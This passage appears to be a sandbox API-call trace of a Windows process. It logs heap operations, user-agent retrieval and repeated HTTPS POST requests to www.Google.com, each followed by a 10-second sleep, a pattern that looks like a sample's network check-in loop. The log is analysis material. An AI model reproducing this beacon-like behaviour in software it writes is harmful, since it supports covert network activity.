3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0147.690] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.Google.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0147.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f10 | out: hHeap=0x4780000) returned 1 [0147.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3ef0 | out: hHeap=0x4780000) returned 1 [0147.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3eb0 | out: hHeap=0x4780000) returned 1 [0147.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3ef0 | out: hHeap=0x4780000) returned 1 [0147.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f60 | out: hHeap=0x4780000) returned 1 [0147.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba3e0 | out: hHeap=0x4780000) returned 1 [0147.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba458 | out: hHeap=0x4780000) returned 1 [0147.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ed0 | out: hHeap=0x4780000) returned 1 [0147.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798cd0 | out: hHeap=0x4780000) returned 1 [0147.712] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0147.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3eb0 | out: hHeap=0x4780000) returned 1 [0147.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f20 | out: hHeap=0x4780000) returned 1 [0147.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f10 | out: hHeap=0x4780000) returned 1 [0147.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3eb0 | out: hHeap=0x4780000) returned 1 [0147.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3de0 | out: hHeap=0x4780000) returned 1 [0147.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba5d8 | out: hHeap=0x4780000) returned 1 [0147.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba5f0 | out: hHeap=0x4780000) returned 1 [0147.713] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d68 | out: hHeap=0x4780000) returned 1 [0147.714] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798cd0 | out: hHeap=0x4780000) returned 1 [0147.718] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0147.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47a3f60 [0147.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47a3f90 [0147.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f60 | out: hHeap=0x4780000) returned 1 [0147.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47a3f70 [0147.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f90 | out: hHeap=0x4780000) returned 1 [0147.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47a3f80 [0147.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f70 | out: hHeap=0x4780000) returned 1 [0147.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47a3eb0 [0147.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f80 | out: hHeap=0x4780000) returned 1 [0147.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba608 [0147.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3eb0 | out: hHeap=0x4780000) returned 1 [0147.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba500 [0147.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba608 | out: hHeap=0x4780000) returned 1 [0147.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798af0 [0147.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba500 | out: hHeap=0x4780000) returned 1 [0147.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0c50 [0147.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0147.721] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47a78d0 [0147.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c50 | out: hHeap=0x4780000) returned 1 [0147.721] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b88 [0147.721] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a74e0 [0147.721] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c28 [0147.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a74e0 | out: hHeap=0x4780000) returned 1 [0147.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a78d0 | out: hHeap=0x4780000) returned 1 [0147.722] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0147.722] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0147.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c28 | out: hHeap=0x4780000) returned 1 [0147.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47a3f60 [0147.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47a3f10 [0147.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f60 | out: hHeap=0x4780000) returned 1 [0147.722] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47a3de0 [0147.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f10 | out: hHeap=0x4780000) returned 1 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47a3f60 [0147.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3de0 | out: hHeap=0x4780000) returned 1 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47a3f00 [0147.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f60 | out: hHeap=0x4780000) returned 1 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba560 [0147.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3f00 | out: hHeap=0x4780000) returned 1 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba590 [0147.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba560 | out: hHeap=0x4780000) returned 1 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798af0 [0147.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba590 | out: hHeap=0x4780000) returned 1 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0d68 [0147.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47a78d0 [0147.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d68 | out: hHeap=0x4780000) returned 1 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ed0 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a79b0 [0147.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c50 [0147.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a79b0 | out: hHeap=0x4780000) returned 1 [0147.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a78d0 | out: hHeap=0x4780000) returned 1 [0147.724] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0147.724] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="", dwHeadersLength=0x0, lpOptional=0x68ab421f*, dwOptionalLength=0x0) returned 1 [0149.047] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c50 | out: hHeap=0x4780000) returned 1 [0149.047] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0149.047] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0149.047] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0149.047] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce720 [0149.047] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce720 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4930 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4690 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4930 | out: hHeap=0x4780000) returned 1 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47de798 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4690 | out: hHeap=0x4780000) returned 1 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9c58 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47de798 | out: hHeap=0x4780000) returned 1 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbef0 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c58 | out: hHeap=0x4780000) returned 1 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9960 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0149.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9cf8 [0149.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0149.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbef0 | out: hHeap=0x4780000) returned 1 [0149.049] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0149.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x400) returned 1 [0149.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9cf8 | out: hHeap=0x4780000) returned 1 [0149.049] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x410) returned 0x47fc440 [0149.049] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x810) returned 0x47ece28 [0149.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ece28 | out: hHeap=0x4780000) returned 1 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fc440 | out: hHeap=0x4780000) returned 1 [0149.050] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4750 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4888 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4750 | out: hHeap=0x4780000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47de798 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9b18 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47de798 | out: hHeap=0x4780000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc18 [0149.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9b18 | out: hHeap=0x4780000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9910 [0149.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0149.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9c08 [0149.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0149.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc18 | out: hHeap=0x4780000) returned 1 [0149.051] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0149.051] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x235) returned 1 [0149.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c08 | out: hHeap=0x4780000) returned 1 [0149.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x240) returned 0x47fc440 [0149.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x470) returned 0x47fc688 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fc688 | out: hHeap=0x4780000) returned 1 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fc440 | out: hHeap=0x4780000) returned 1 [0149.052] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0149.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce660 [0149.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0149.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0149.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0149.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce660 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0149.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4810 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0149.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4720 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4810 | out: hHeap=0x4780000) returned 1 [0149.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47de798 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4720 | out: hHeap=0x4780000) returned 1 [0149.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9c58 [0149.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47de798 | out: hHeap=0x4780000) returned 1 [0149.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0149.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c58 | out: hHeap=0x4780000) returned 1 [0149.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9b40 [0149.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0149.053] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9b18 [0149.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0149.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0149.053] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0149.053] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0149.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9b18 | out: hHeap=0x4780000) returned 1 [0149.054] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0149.054] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0149.054] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0149.054] FreeLibrary (hLibModule=0x71570000) returned 1 [0149.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0149.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0149.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0149.055] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0cc8 | out: hHeap=0x4780000) returned 1 [0149.055] Sleep (dwMilliseconds=0x2710) [0159.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5d0 [0159.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0159.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5d0 | out: hHeap=0x4780000) returned 1 [0159.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0159.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0159.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0159.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0159.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce660 [0159.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0159.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4810 [0159.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0159.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4690 [0159.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4810 | out: hHeap=0x4780000) returned 1 [0159.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47de798 [0159.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4690 | out: hHeap=0x4780000) returned 1 [0159.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f4930 [0159.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9cf8 [0159.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9cf8 | out: hHeap=0x4780000) returned 1 [0159.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47de798 | out: hHeap=0x4780000) returned 1 [0159.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9bb8 [0159.096] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0159.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0159.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0159.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0159.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce580 [0159.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0159.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce580 | out: hHeap=0x4780000) returned 1 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0159.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4690 [0159.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f46a8 [0159.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4690 | out: hHeap=0x4780000) returned 1 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47de978 [0159.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46a8 | out: hHeap=0x4780000) returned 1 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9b18 [0159.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47de978 | out: hHeap=0x4780000) returned 1 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0159.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9b18 | out: hHeap=0x4780000) returned 1 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9b18 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0159.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9be0 [0159.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0159.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0159.100] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0159.101] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0159.562] FreeLibrary (hLibModule=0x71780000) returned 1 [0159.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9be0 | out: hHeap=0x4780000) returned 1 [0159.563] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0159.563] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.Google.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0159.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0159.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5d0 [0159.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0159.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0159.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5d0 | out: hHeap=0x4780000) returned 1 [0159.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0159.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0159.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0159.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0159.565] RtlAllocateHeap 